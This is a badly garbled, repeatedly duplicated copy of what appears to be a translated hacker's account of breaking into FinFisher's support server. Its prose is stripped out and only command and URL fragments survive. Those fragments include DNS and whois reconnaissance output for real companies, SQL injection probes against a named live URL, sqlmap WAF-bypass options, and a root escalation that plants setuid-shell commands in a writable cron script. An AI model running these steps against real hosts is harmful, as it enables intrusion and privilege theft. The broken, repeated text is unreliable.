https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !



, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .



40 . , PGP- , . GitHub, : https://github.com/FinFisher .

:

Hacker News Reddit



https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/

:

The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated

• C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).

:

40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .

.



, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .



fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - :

54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .



nmap- IP- . SNMP-.

:

-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .



, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .



, . . . :

